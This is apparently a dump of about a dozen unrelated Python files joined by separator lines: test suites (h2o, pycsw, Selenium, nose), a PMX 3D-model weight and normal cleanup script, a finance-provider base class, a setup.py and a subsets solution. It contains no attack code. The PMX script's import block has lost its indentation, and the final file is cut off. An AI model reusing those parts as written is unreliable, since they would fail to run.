recognize bugs in h2o.init() for this mode of operation.
For this ticket, I think we should create a set of tests that check that h2o.init() is successful for each
OS/client interface combination.
"""
from __future__ import print_function
import sys
sys.path.insert(0, "../..")
import h2o
from h2o.backend import H2OLocalServer
from h2o.exceptions import H2OConnectionError
PORT = 55330
# Check whether there is already an instance running at the specified port, and if so shut it down.
try:
    conn = h2o.connect(ip="localhost", port=PORT)
    conn.cluster.shutdown(prompt=False)
except H2OConnectionError:
    # nothing was listening on PORT — that is fine, carry on
    pass
# The server takes some time to shut down, so try different ports
print("Start a server with max_mem_size = 1Gb")
h2o.init(max_mem_size="1g", port=10101, strict_version_check=False)
h2o.cluster().shutdown()
print("Starting a server with min_mem_size = 314Mb")
h2o.init(min_mem_size="314M", port=20202, strict_version_check=False)
h2o.cluster().shutdown()
print("Starting a server explicitly")
# Now start a new H2O server and connect to it.
# NOTE(review): the "+" suffix presumably tells H2OLocalServer to probe upward
# from PORT for a free port — TODO confirm against the h2o.backend docs
server = H2OLocalServer.start(port=str(PORT) + "+")
conn = h2o.connect(server=server)
# Get if cluster is up (True) or not (False)
cluster_up = conn.cluster.is_running()
# Check if cluster is healthy
cluster_healthy = all(node["healthy"] for node in conn.cluster.nodes)
# Logical test to see if status is healthy or not
if cluster_healthy and cluster_up:
    print("Cluster is up and healthy")
elif not cluster_healthy and cluster_up:
    raise ValueError("Cluster is up but not healthy")
else:
    # the cluster never came up at all (health is irrelevant in this branch)
    raise ValueError("Cluster is not up and is not healthy")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# [The "New BSD" license]
# Copyright (c) 2014 The Board of Trustees of The University of Alabama
# All rights reserved.
#
# See LICENSE for details.
from nose.tools import *
import unittest

import src


class TestExample(unittest.TestCase):
    """Minimal smoke tests demonstrating the nose/unittest setup."""

    def setUp(self):
        self.is_setup = True

    def test_truth(self):
        assert self.is_setup

    @raises(AssertionError)
    def test_passes_by_failing(self):
        # the assert fails; @raises(AssertionError) turns that into a pass
        assert not self.is_setup


# BUG FIX: this guard used to sit at the very top of the file. nose.main()
# runs the test session and then exits the process, so when the file was
# executed directly the imports and TestExample below it never ran at all.
# The guard belongs after the definitions, like unittest.main().
if __name__ == '__main__':
    import nose
    nose.main()
|
# =================================================================
#
# Authors: Ricardo Garcia Silva <ricardo.garcia.silva@gmail.com>
#
# Copyright (c) 2017 Ricardo Garcia Silva
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
"""Unit tests for pycsw.wsgi"""
from wsgiref.util import setup_testing_defaults
import mock
import pytest
from pycsw import wsgi
pytestmark = pytest.mark.unit
@pytest.mark.parametrize("process_env, wsgi_env, fake_dir, expected", [
    # no env overrides anywhere: fall back to dirname of the wsgi module
    ({}, None, "dummy", "dummy"),
    # PYCSW_ROOT from the process environment wins over the fallback
    ({"PYCSW_ROOT": "this"}, None, "dummy", "this"),
    # process environment takes precedence over the per-request environment
    ({"PYCSW_ROOT": "this"}, {"PYCSW_ROOT": "that"}, "dummy", "this"),
    # request environment is used when the process env has no PYCSW_ROOT
    ({}, {"PYCSW_ROOT": "that"}, "dummy", "that"),
])
def test_get_pycsw_root_path(process_env, wsgi_env, fake_dir, expected):
    """get_pycsw_root_path resolves PYCSW_ROOT with the process environment
    taking precedence over the WSGI request environment."""
    # patch os so the dirname() fallback is deterministic
    with mock.patch("pycsw.wsgi.os", autospec=True) as mock_os:
        mock_os.path.dirname.return_value = fake_dir
        result = wsgi.get_pycsw_root_path(
            process_env,
            request_environment=wsgi_env
        )
        assert result == expected
@pytest.mark.parametrize("process_env, wsgi_env, pycsw_root, expected", [
    # no config anywhere: fall back to default.cfg under the pycsw root
    ({}, {}, "dummy", "dummy/default.cfg"),
    # PYCSW_CONFIG taken from the process environment (relative path kept as-is)
    ({"PYCSW_CONFIG": "default.cfg"}, {}, "dummy", "default.cfg"),
    # absolute PYCSW_CONFIG kept as-is
    (
        {"PYCSW_CONFIG": "/some/abs/path/default.cfg"},
        {},
        "dummy",
        "/some/abs/path/default.cfg"
    ),
    # empty query string does not override the environment
    (
        {"PYCSW_CONFIG": "default.cfg"},
        {"QUERY_STRING": ""},
        "dummy",
        "default.cfg"
    ),
    # a config=... query-string parameter overrides the environment
    (
        {"PYCSW_CONFIG": "default.cfg"},
        {"QUERY_STRING": "config=other.cfg"},
        "dummy",
        "other.cfg"
    ),
    (
        {"PYCSW_CONFIG": "default.cfg"},
        {"QUERY_STRING": "config=/other/path/other.cfg"},
        "dummy",
        "/other/path/other.cfg"
    ),
])
def test_get_configuration_path(process_env, wsgi_env, pycsw_root, expected):
    """get_configuration_path resolves the pycsw config file from the process
    environment, optionally overridden by a config= query-string parameter."""
    result = wsgi.get_configuration_path(process_env, wsgi_env, pycsw_root)
    assert result == expected
@pytest.mark.parametrize("compression_level", [
    1, 2, 3, 4, 5, 6, 7, 8, 9,
])
def test_compress_response(compression_level):
    """compress_response must pass the requested gzip level through to
    GzipFile and advertise gzip in the response headers."""
    payload = "dummy"
    with mock.patch("pycsw.wsgi.gzip", autospec=True) as gzip_mock:
        body, response_headers = wsgi.compress_response(
            payload, compression_level)
        gzipfile_kwargs = gzip_mock.GzipFile.call_args[1]
        assert gzipfile_kwargs["compresslevel"] == compression_level
        assert response_headers["Content-Encoding"] == "gzip"
def test_application_no_gzip():
    """application() dispatches the request through pycsw.server.Csw and
    returns the uncompressed body when the client does not accept gzip."""
    fake_config_path = "fake_config_path"
    fake_status = "fake_status"
    fake_response = "fake_response"
    fake_content_type = "fake_content_type"
    request_env = {}
    # fill in the mandatory WSGI environ keys
    setup_testing_defaults(request_env)
    mock_start_response = mock.MagicMock()
    with mock.patch("pycsw.wsgi.server", autospec=True) as mock_server, \
            mock.patch.object(
                wsgi, "get_configuration_path") as mock_get_config_path:
        mock_get_config_path.return_value = fake_config_path
        mock_csw_class = mock_server.Csw
        mock_pycsw = mock_csw_class.return_value
        # dispatch_wsgi returns (http_status, response_body)
        mock_pycsw.dispatch_wsgi.return_value = (fake_status, fake_response)
        mock_pycsw.contenttype = fake_content_type
        result = wsgi.application(request_env, mock_start_response)
    # Csw must be constructed with the resolved config path and the environ
    mock_csw_class.assert_called_with(fake_config_path, request_env)
    start_response_args = mock_start_response.call_args[0]
    assert fake_status in start_response_args
    # WSGI apps return an iterable of body chunks
    assert result == [fake_response]
def test_application_gzip():
    """application() compresses the response at the configured level when the
    client sends Accept-Encoding: gzip."""
    fake_config_path = "fake_config_path"
    fake_status = "fake_status"
    fake_response = "fake_response"
    fake_content_type = "fake_content_type"
    fake_compression_level = 5
    fake_compressed_contents = "fake compressed contents"
    fake_compression_headers = {"phony": "dummy"}
    # the client opts into gzip via the Accept-Encoding header
    request_env = {"HTTP_ACCEPT_ENCODING": "gzip"}
    setup_testing_defaults(request_env)
    mock_start_response = mock.MagicMock()
    with mock.patch("pycsw.wsgi.server", autospec=True) as mock_server, \
            mock.patch.object(
                wsgi, "get_configuration_path") as mock_get_config_path, \
            mock.patch.object(wsgi, "compress_response") as mock_compress:
        mock_compress.return_value = (fake_compressed_contents,
                                      fake_compression_headers)
        mock_get_config_path.return_value = fake_config_path
        mock_csw_class = mock_server.Csw
        mock_pycsw = mock_csw_class.return_value
        mock_pycsw.config = mock.MagicMock()
        # the compression level is read from the pycsw configuration
        mock_pycsw.config.get.return_value = fake_compression_level
        mock_pycsw.dispatch_wsgi.return_value = (fake_status, fake_response)
        mock_pycsw.contenttype = fake_content_type
        wsgi.application(request_env, mock_start_response)
        # level must come from [server] gzip_compresslevel ...
        mock_pycsw.config.get.assert_called_with("server",
                                                 "gzip_compresslevel")
        # ... and be applied to the dispatched response body
        mock_compress.assert_called_with(fake_response, fake_compression_level)
|
# -*- coding: utf-8 -*-
from openprocurement.api.utils import json_view
from openprocurement.tender.core.utils import optendersresource
from openprocurement.tender.core.validation import (
validate_patch_contract_data,
validate_update_contract_value,
validate_update_contract_only_for_active_lots,
validate_contract_operation_not_in_allowed_status,
validate_update_contract_value_with_award,
validate_update_contract_value_amount,
validate_update_contract_value_net_required,
validate_update_contract_status_by_supplier,
validate_activate_contract,
validate_update_contract_status,
)
from openprocurement.tender.belowthreshold.views.contract import (
TenderAwardContractResource,
)
from openprocurement.tender.cfaselectionua.utils import check_tender_status
@optendersresource(
    name="closeFrameworkAgreementSelectionUA:Tender Contracts",
    collection_path="/tenders/{tender_id}/contracts",
    path="/tenders/{tender_id}/contracts/{contract_id}",
    procurementMethodType="closeFrameworkAgreementSelectionUA",
    description="Tender contracts",
)
class TenderAwardContractResource(TenderAwardContractResource):
    """Tender contract resource for the closeFrameworkAgreementSelectionUA
    procedure.

    NOTE: intentionally shadows the imported belowthreshold
    TenderAwardContractResource — it subclasses it and re-registers the
    routes for this procurementMethodType with its own status check and
    validator chain.
    """

    @staticmethod
    def check_tender_status_method(request):
        # delegate to the cfaselectionua-specific tender status check
        return check_tender_status(request)

    @json_view(
        content_type="application/json",
        permission="edit_contract",
        validators=(
            validate_patch_contract_data,
            validate_contract_operation_not_in_allowed_status,
            validate_update_contract_status_by_supplier,
            validate_update_contract_status,
            validate_update_contract_only_for_active_lots,
            validate_update_contract_value,
            validate_update_contract_value_net_required,
            validate_update_contract_value_with_award,
            validate_update_contract_value_amount,
        ),
    )
    def patch(self):
        # behavior is inherited; this override only rebinds the validators above
        return super(TenderAwardContractResource, self).patch()
|
from model.group import Group
import random
def test_edit_group_name(app, db):
    """Editing a random group's name must not change the number of groups."""
    # guarantee there is at least one group to edit
    if app.group.count() == 0:
        app.group.create(Group(name="test"))
    groups_before = db.get_group_list()
    victim = random.choice(groups_before)
    app.group.edit_group_by_id(victim.id, Group(name="new name"))
    groups_after = db.get_group_list()
    assert len(groups_before) == len(groups_after)
def test_edit_group_header(app, db):
    """Editing a random group's header must not change the number of groups."""
    # guarantee there is at least one group to edit
    if app.group.count() == 0:
        app.group.create(Group(name="test"))
    groups_before = db.get_group_list()
    victim = random.choice(groups_before)
    app.group.edit_group_by_id(victim.id, Group(header="new header"))
    groups_after = db.get_group_list()
    assert len(groups_before) == len(groups_after)
def test_edit_group_footer(app, db):
    """Editing a random group's footer must not change the number of groups."""
    # guarantee there is at least one group to edit
    if app.group.count() == 0:
        app.group.create(Group(name="test"))
    groups_before = db.get_group_list()
    victim = random.choice(groups_before)
    app.group.edit_group_by_id(victim.id, Group(footer="new footer"))
    groups_after = db.get_group_list()
    assert len(groups_before) == len(groups_after)
|
from egat.testset import SequentialTestSet
from egat.testset import UnorderedTestSet
from selenium import webdriver
# In the SequentialTestSet, the setup and teardown methods will be called before any
# tests are executed and after all tests are finished, respectively. If you run
# these tests you will see that the browser only launches once.
#
# This is a special behavior which is built into the TestRunner, so 'setup' and
# 'teardown' are reserved keywords when working with the TestSet class.
class TestSetupAndTeardown1(SequentialTestSet):
    """Demo of SequentialTestSet: setup/teardown run once around the whole
    set, so a single browser instance is shared by all four tests."""

    def setup(self):
        # runs once, before the first test in the set
        self.browser = webdriver.Firefox()

    def testDuck(self):
        self.browser.get("http://duckduckgo.com")

    def testGoogle(self):
        self.browser.get("http://google.com")

    def testBing(self):
        self.browser.get("http://bing.com")
        # NOTE(review): deliberate failure — presumably here to demonstrate
        # that teardown still runs after a failing test; confirm intent
        assert(False)

    def testYahoo(self):
        self.browser.get("http://yahoo.com")

    def teardown(self):
        # runs once, after the last test in the set
        self.browser.quit()
# In the UnorderedTestSet, the setup and teardown methods will be called before each
# test method and after each test method, respectively. If you run these tests you
# will see the browser launch before each test and quit after each test.
class TestSetupAndTeardown2(UnorderedTestSet):
    """Demo of UnorderedTestSet: setup/teardown run around EACH test, so a
    fresh browser is launched and quit for every test method."""

    def setup(self):
        # runs before every individual test
        self.browser = webdriver.Firefox()

    def testDuck(self):
        self.browser.get("http://duckduckgo.com")

    def testGoogle(self):
        self.browser.get("http://google.com")

    def testBing(self):
        self.browser.get("http://bing.com")
        # NOTE(review): deliberate failure — presumably here to demonstrate
        # that per-test teardown still runs after a failure; confirm intent
        assert(False)

    def testYahoo(self):
        self.browser.get("http://yahoo.com")

    def teardown(self):
        # runs after every individual test
        self.browser.quit()
|
# Nuthouse01 - 08/24/2020 - v5.00
# This code is free to use and re-distribute, but I cannot be held responsible for damages that it may or may not cause.
#####################
# first, system imports
from typing import List, Tuple
# second, wrap custom imports with a try-except to catch it if files are missing
try:
from . import nuthouse01_core as core
from . import nuthouse01_pmx_parser as pmxlib
from . import nuthouse01_pmx_struct as pmxstruct
except ImportError as eee:
try:
import nuthouse01_core as core
import nuthouse01_pmx_parser as pmxlib
import nuthouse01_pmx_struct as pmxstruct
except ImportError as eee:
print(eee.__class__.__name__, eee)
print("ERROR: failed to import some of the necessary files, all my scripts must be together in the same folder!")
print("...press ENTER to exit...")
input()
exit()
core = pmxlib = pmxstruct = None
# when debug=True, disable the catchall try-except block. this means the full stack trace gets printed when it crashes,
# but if launched in a new window it exits immediately so you can't read it.
DEBUG = False
# user-facing help text printed by showhelp()/showprompt(); keep wording verbatim
helptext = '''====================
weight_cleanup:
This function will fix the vertex weights that are weighted twice to the same bone, a minor issue that sometimes happens when merging bones.
This also normalizes the weights of all vertices, and normalizes the normal vectors for all vertices.
'''
iotext = '''Inputs: PMX file "[model].pmx"\nOutputs: PMX file "[model]_weightfix.pmx"
'''
def showhelp():
    """Print the help text that explains the purpose of this script."""
    # print info to explain the purpose of this file
    core.MY_PRINT_FUNC(helptext)
def showprompt():
    """Prompt the user for a PMX file, parse it, and return (pmx, filename)."""
    # print info to explain what inputs/outputs it needs/creates
    core.MY_PRINT_FUNC(iotext)
    # prompt PMX name
    core.MY_PRINT_FUNC("Please enter name of PMX model file:")
    input_filename_pmx = core.prompt_user_filename(".pmx")
    pmx = pmxlib.read_pmx(input_filename_pmx, moreinfo=True)
    return pmx, input_filename_pmx
def normalize_weights(pmx: pmxstruct.Pmx) -> int:
    """
    Normalize weights for verts in the PMX object. Also "clean" the weights by removing bones with 0 weight, reducing
    weight type to lowest possible, and sorting them by greatest weight. Return the # of vertices that were modified.
    Vertices are modified in-place.
    :param pmx: PMX object
    :return: int, # of vertices that were modified
    """
    # number of vertices fixed
    weight_fix = 0
    # for each vertex:
    for d, vert in enumerate(pmx.verts):
        # clean/normalize the weights
        weighttype = vert.weighttype
        w = vert.weight
        # type0=BDEF1, one bone has 100% weight
        # do nothing
        # type1=BDEF2, 2 bones 1 weight (other is implicit)
        # merge, see if it can reduce to BDEF1
        # type2=BDEF4, 4 bones 4 weights
        # normalize, merge, see if it can reduce to BDEF1/2
        # type3=SDEF, 2 bones 1 weight and 12 values i don't understand.
        # nothing
        # type4=QDEF, 4 bones 4 weights
        # normalize, merge
        if weighttype == 0:  # BDEF1
            # nothing to be fixed here
            continue
        elif weighttype == 1:  # BDEF2
            # BDEF2 layout here: w = [bone_a, bone_b, weight_of_bone_a]
            # no need to normalize because the 2nd weight is implicit, not explicit
            # only merge dupes, look for reason to reduce to BDEF1: bones are same, weight is 0/1
            # NOTE(review): exact float compares (w[2] == 1 / == 0) assume the
            # parser stores exact 0.0/1.0 for these cases — confirm in pmxlib
            if w[0] == w[1] or w[2] == 1:  # same bones handled the same way as firstbone with weight 1
                weight_fix += 1
                vert.weighttype = 0  # set to BDEF1
                vert.weight = [w[0]]
            elif w[2] == 0:  # firstbone has weight 0
                weight_fix += 1
                vert.weighttype = 0  # set to BDEF1
                vert.weight = [w[1]]
            continue
        elif weighttype == 2 or weighttype == 4:  # BDEF4/QDEF
            # layout here: w[0:4] = bone indices, w[4:8] = corresponding weights
            # qdef: check for dupes and also normalize
            bones = w[0:4]
            weights = w[4:8]
            is_modified = False
            # unify dupes
            usedbones = []
            for i in range(4):
                if not (bones[i] == 0 and weights[i] == 0.0) and (bones[i] in usedbones):
                    is_modified = True  # then this is a duplicate bone!
                    where = usedbones.index(bones[i])  # find index where it was first used
                    weights[where] += weights[i]  # combine this bone's weight with the first place it was used
                    bones[i] = 0  # set this bone to null
                    weights[i] = 0.0  # set this weight to 0
                # add to list of usedbones regardless of whether first or dupe
                usedbones.append(bones[i])
            # sort by greatest weight
            before = tuple(bones)
            together = list(zip(bones, weights))  # zip
            together.sort(reverse=True, key=lambda x: x[1])  # sort
            a, b = zip(*together)  # unzip
            if hash(before) != hash(a):  # did the order change?
                is_modified = True
                bones = list(a)
                weights = list(b)
            # normalize if needed
            s = sum(weights)
            if round(s, 6) != 1.0:
                if s == 0:
                    core.MY_PRINT_FUNC("Error: vert %d has BDEF4 weights that sum to 0, cannot normalize" % d)
                    continue
                # it needs it, do it
                weights = [t / s for t in weights]
                is_modified = True
            try:
                # where is the first 0 in the weight list? i know it is sorted descending
                i = weights.index(0)
                if i == 1:  # first zero at 1, therefore has 1 entry, therefore force to be BDEF1!
                    weight_fix += 1
                    vert.weighttype = 0  # set to BDEF1
                    vert.weight = [bones[0]]
                    continue
                if weighttype == 2:  # BDEF4 ONLY: check if it can be reduced to BDEF2
                    if i == 2:  # first zero at 2, therefore has 2 nonzero entries, therefore force to be BDEF2!
                        weight_fix += 1
                        vert.weighttype = 1  # set to BDEF2
                        vert.weight = [bones[0], bones[1], weights[0]]
                        continue
                    # if i == 3, fall thru
            except ValueError:
                pass  # if '0' not found in list, it is using all 4, fall thru
            # is QDEF, or was BDEF and determined to still be BDEF4
            # type stays the same, but have i changed the values? if so store and increment
            if is_modified:
                w[0:4] = bones
                w[4:8] = weights
                weight_fix += 1
        elif weighttype == 3:  # SDEF
            # the order of the bones makes a very very slight difference, so don't try to reorder them
            # do try to compress to BDEF1 if the bones are the same or if one has 100 or 0 weight
            if w[0] == w[1] or w[2] == 1:  # same bones handled the same way as firstbone with weight 1
                weight_fix += 1
                vert.weighttype = 0  # set to BDEF1
                vert.weight = [w[0]]
            elif w[2] == 0:  # firstbone has weight 0
                weight_fix += 1
                vert.weighttype = 0  # set to BDEF1
                vert.weight = [w[1]]
            continue
        else:
            core.MY_PRINT_FUNC("ERROR: invalid weight type for vertex %d" % d)
        pass  # close the for-each-vert loop
    # how many did I change? printing is handled outside
    return weight_fix
def normalize_normals(pmx: pmxstruct.Pmx) -> Tuple[int, List[int]]:
    """
    Normalize normal vectors for each vertex in the PMX object. Return # of verts that were modified, and also a list
    of all vert indexes that have 0,0,0 normals and need special handling.
    :param pmx: PMX list-of-lists object
    :return: # verts modified + list of all vert idxs that have 0,0,0 normals
    """
    fixed_count = 0
    zero_norm_idxs = []
    for idx, vert in enumerate(pmx.verts):
        if vert.norm == [0, 0, 0]:
            # a zero vector cannot be normalized; the caller repairs these later
            zero_norm_idxs.append(idx)
            continue
        length = core.my_euclidian_distance(vert.norm)
        # only rewrite the normal when it is measurably off unit length
        if round(length, 6) != 1.0:
            fixed_count += 1
            vert.norm = [component / length for component in vert.norm]
    # printing is handled outside
    return fixed_count, zero_norm_idxs
def repair_invalid_normals(pmx: pmxstruct.Pmx, normbad: List[int]) -> int:
    """
    Repair all 0,0,0 normals in the model by averaging the normal vector for each face that vertex is a member of.
    It is theoretically possible for a vertex to be a member in two faces with exactly opposite normals, and therefore
    the average would be zero; in this case one of the faces is arbitrarily chosen and its normal is used. Therefore,
    after this function all invalid normals are guaranteed to be fixed.
    Returns the number of times this fallback method was used.
    :param pmx: PMX list-of-lists object
    :param normbad: list of vertex indices so I don't need to walk all vertices again
    :return: # times fallback method was used
    """
    normbad_err = 0
    # create a list in parallel with the faces list for holding the perpendicular normal to each face
    facenorm_list = [list() for i in pmx.faces]
    # create a list in parallel with normbad for holding the set of faces connected to each bad-norm vert
    normbad_linked_faces = [list() for i in normbad]
    # goal: build the sets of faces that are associated with each bad vertex
    # first, flatten the list of face-vertices, probably faster to search that way
    flatlist = [item for sublist in pmx.faces for item in sublist]
    # second, for each face-vertex, check if it is a bad vertex
    # (this takes 70% of time)
    for d, facevert in enumerate(flatlist):
        core.print_progress_oneline(.7 * d / len(flatlist))
        # bad vertices are unique and in sorted order, can use binary search to further optimize
        whereinlist = core.binary_search_wherein(facevert, normbad)
        if whereinlist != -1:
            # if it is a bad vertex, int div by 3 to get face ID
            # (flatlist holds exactly 3 verts per face, in face order)
            (normbad_linked_faces[whereinlist]).append(d // 3)
    # for each bad vert:
    # (this takes 30% of time)
    for d, (badvert_idx, badvert_faces) in enumerate(zip(normbad, normbad_linked_faces)):
        newnorm = [0, 0, 0]  # default value in case something goes wrong
        core.print_progress_oneline(.7 + (.3 * d / len(normbad)))
        # iterate over the faces it is connected to
        for face_id in badvert_faces:
            # for each face, does the perpendicular normal already exist in the parallel list? if not, calculate and save it for reuse
            facenorm = facenorm_list[face_id]
            if not facenorm:
                # need to calculate it! use cross product or whatever
                # q,r,s order of vertices is important!
                q = pmx.verts[ pmx.faces[face_id][0] ].pos
                r = pmx.verts[ pmx.faces[face_id][1] ].pos
                s = pmx.verts[ pmx.faces[face_id][2] ].pos
                # qr, qs order of vertices is critically important!
                qr = [r[i] - q[i] for i in range(3)]
                qs = [s[i] - q[i] for i in range(3)]
                facenorm = core.my_cross_product(qr, qs)
                # then normalize the fresh normal
                norm_L = core.my_euclidian_distance(facenorm)
                try:
                    facenorm = [n / norm_L for n in facenorm]
                except ZeroDivisionError:
                    # this should never happen in normal cases
                    # however it can happen when the verts are at the same position and therefore their face has zero surface area
                    facenorm = [0, 1, 0]
                # then save the result so I don't have to do this again
                facenorm_list[face_id] = facenorm
            # once I have the perpendicular normal for this face, then accumulate it (will divide later to get avg)
            for i in range(3):
                newnorm[i] += facenorm[i]
        # error case check, theoretically possible for this to happen if there are no connected faces or their normals exactly cancel out
        if newnorm == [0, 0, 0]:
            if len(badvert_faces) == 0:
                # if there are no connected faces, set the normal to 0,1,0 (same handling as PMXE)
                pmx.verts[badvert_idx].norm = [0, 1, 0]
            else:
                # if there are faces that just so happened to perfectly cancel, choose the first face and use its normal
                pmx.verts[badvert_idx].norm = facenorm_list[badvert_faces[0]]
            normbad_err += 1
            continue
        # when done accumulating, divide by # to make an average
        # zerodiv err not possible: if there are no connected faces then it will hit [0,0,0] branch above
        newnorm = [n / len(badvert_faces) for n in newnorm]
        # then normalize this, again
        norm_L = core.my_euclidian_distance(newnorm)
        newnorm = [n / norm_L for n in newnorm]
        # finally, apply this new normal
        pmx.verts[badvert_idx].norm = newnorm
    return normbad_err
# TODO: rename this script & this function
def weight_cleanup(pmx: pmxstruct.Pmx, moreinfo=False):
    """Clean/normalize all vertex weights and normals in the model, in-place.

    :param pmx: PMX object, modified in-place
    :param moreinfo: if True, also warn when the fallback normal-repair was used
    :return: tuple (pmx, bool) — the bool says whether anything was changed
    """
    #############################
    # part 1: fix all the weights, get an answer for how many i changed
    weight_fix = normalize_weights(pmx)
    if weight_fix:
        core.MY_PRINT_FUNC("Fixed weights for {} / {} = {:.1%} of all vertices".format(
            weight_fix, len(pmx.verts), weight_fix/len(pmx.verts)))
    #############################
    # part 2: normalize all normals that aren't invalid, also count how many are invalid
    # also build 'normbad' to identify all verts w/ 0,0,0 normals so I can get a progress % in following step
    norm_fix, normbad = normalize_normals(pmx)
    if norm_fix:
        core.MY_PRINT_FUNC("Normalized normals for {} / {} = {:.1%} of all vertices".format(
            norm_fix, len(pmx.verts), norm_fix / len(pmx.verts)))
    #############################
    # part 3: normalize all the normals that were invalid
    if normbad:
        normbad_err = repair_invalid_normals(pmx, normbad)
        core.MY_PRINT_FUNC("Repaired invalid normals for {} / {} = {:.1%} of all vertices".format(
            len(normbad), len(pmx.verts), len(normbad) / len(pmx.verts)))
        if normbad_err and moreinfo:
            core.MY_PRINT_FUNC("WARNING: used fallback vertex repair method for %d vertices" % normbad_err)
    if weight_fix == 0 and norm_fix == 0 and len(normbad) == 0:
        core.MY_PRINT_FUNC("No changes are required")
        return pmx, False
    return pmx, True
def end(pmx, input_filename_pmx):
    """Write the modified PMX next to the input file as [model]_weightfix.pmx."""
    # write out
    # output_filename_pmx = "%s_weightfix.pmx" % core.get_clean_basename(input_filename_pmx)
    out_path = input_filename_pmx[:-4] + "_weightfix.pmx"
    out_path = core.get_unused_file_name(out_path)
    pmxlib.write_pmx(out_path, pmx, moreinfo=True)
    return None
def main():
    """Interactive entry point: prompt for a PMX, clean it, write the result."""
    showhelp()
    pmx, name = showprompt()
    pmx, is_changed = weight_cleanup(pmx)
    # only write an output file if something was actually modified
    if is_changed:
        end(pmx, name)
    core.pause_and_quit("Done with everything! Goodbye!")
if __name__ == '__main__':
    core.MY_PRINT_FUNC("Nuthouse01 - 08/24/2020 - v5.00")
    if DEBUG:
        # debug mode: let exceptions propagate so the full stack trace is visible
        main()
    else:
        try:
            main()
        except (KeyboardInterrupt, SystemExit):
            # this is normal and expected, do nothing and die normally
            pass
        except Exception as ee:
            # if an unexpected error occurs, catch it and print it and call pause_and_quit so the window stays open for a bit
            core.MY_PRINT_FUNC(ee)
            core.pause_and_quit("ERROR: something truly strange and unexpected has occurred, sorry, good luck figuring out what tho")
|
from finbot.providers.errors import RetiredProviderError
from typing import Any, Type, TypeVar, TypedDict, Optional
class Account(TypedDict):
    """Identifying details of one account held at a financial provider."""
    id: str
    name: str
    iso_currency: str
    type: str
class BalanceEntry(TypedDict):
    """Balance of a single account."""
    account: Account
    balance: float
class Balances(TypedDict):
    """Balances for every account at a provider."""
    accounts: list[BalanceEntry]
class Asset(TypedDict, total=False):
    """One asset; all keys optional (total=False)."""
    name: str
    type: str
    value: float
    units: Optional[float]
    provider_specific: Optional[dict[str, Any]]
class AssetEntry(TypedDict):
    """Assets held in a single account."""
    account: Account
    assets: list[Asset]
class Assets(TypedDict):
    """Assets for every account at a provider."""
    accounts: list[AssetEntry]
class LiabilityDescription(TypedDict):
    """One liability (e.g. a debt) and its value."""
    name: str
    type: str
    value: float
class LiabilityEntry(TypedDict):
    """Liabilities attached to a single account."""
    account: Account
    liabilities: list[LiabilityDescription]
class Liabilities(TypedDict):
    """Liabilities for every account at a provider."""
    accounts: list[LiabilityEntry]
class Base(object):
    """Base class for financial data providers; subclasses override as needed."""
    def __init__(self, **kwargs: Any):
        pass
    def authenticate(self, credentials: Any) -> None:
        """Authenticate user with provided credentials. Should persist any
        information needed to perform further operations (get balances,
        get assets, get liabilities)
        :raises AuthFailure: should be raised if authentication failed
        """
        pass
    def get_balances(self) -> Balances:
        """Return the balance of each account; default is no accounts."""
        return {"accounts": []}
    def get_assets(self) -> Assets:
        """Return the assets in each account; default is no accounts."""
        return {"accounts": []}
    def get_liabilities(self) -> Liabilities:
        """Return the liabilities in each account; default is no accounts."""
        return {"accounts": []}
    def close(self) -> None:
        """Implement to release any used resource at the end of the session"""
        pass
T = TypeVar("T")
def retired(cls: Type[T]) -> Type[T]:
    """Class decorator marking a provider as retired: any attempt to
    instantiate the decorated class raises RetiredProviderError."""
    def _raise_retired(*_args: Any, **_kwargs: Any) -> None:
        raise RetiredProviderError()
    cls.__init__ = _raise_retired  # type: ignore
    return cls
|
"""Module defining classes and functions related to website accounts.
Uses Google Python Style Guide: https://google.github.io/styleguide/pyguide.html
"""
class Account:
    """Represents a website account.

    Attributes:
        password: A string containing the password of the user's account.
        username: An (optional) string containing the username of the
            user's account.
        email: An (optional) string containing the email of the user's
            account.
    """

    def __init__(self, password, username=None, email=None):
        """Initializes Account class with password and, optionally,
        username and email.
        """
        self.password = password
        # BUG FIX: this previously read `self.username = email`, which
        # silently discarded the username argument and stored the email twice
        self.username = username
        self.email = email
|
from pathlib import Path
from setuptools import setup, find_packages
# Distribution metadata for the metovhooks package (personal git hooks).
setup(
    name="metovhooks",
    version="0.1.8",
    description="My personal git hooks.",
    url="https://github.com/metov/metovhooks",
    # reuse the README as the PyPI long description
    long_description=Path("README.md").read_text(),
    long_description_content_type="text/markdown",
    author="Azat Akhmetov",
    author_email="azatinfo@yandex.com",
    classifiers=[
        "Programming Language :: Python :: 3",
        "Development Status :: 3 - Alpha",
        "License :: OSI Approved :: MIT License",
    ],
    packages=find_packages(),
    install_requires=[
        "coloredlogs",
        "docopt",
        "GitPython",
        "packaging",
        "pre_commit_hooks",
        "toml",
    ],
    # each hook is exposed as a console command
    entry_points={
        "console_scripts": [
            "require_version_bump = metovhooks.require_version_bump:main",
            "protect_branch = metovhooks.protect_branch:main",
        ]
    },
)
|
class Solution:
    def subsets(self, nums: List[int]) -> List[List[int]]:
        """Return every subset of nums via bitmask enumeration.

        Mask m selects nums[j] whenever bit j of m is set, so each subset
        preserves the relative order of elements in nums, and subsets are
        produced in increasing mask order (same as the iterative version).
        """
        count = len(nums)
        result = []
        for mask in range(1 << count):
            subset = [nums[j] for j in range(count) if (mask >> j) & 1]
            result.append(subset)
        return result
|
from arm.logicnode.arm_nodes import *
class StringNode(ArmLogicTreeNode):
    """Stores a string as a variable."""
    bl_idname = 'LNStringNode'
    bl_label = 'String'
    arm_version = 1
    def init(self, context):
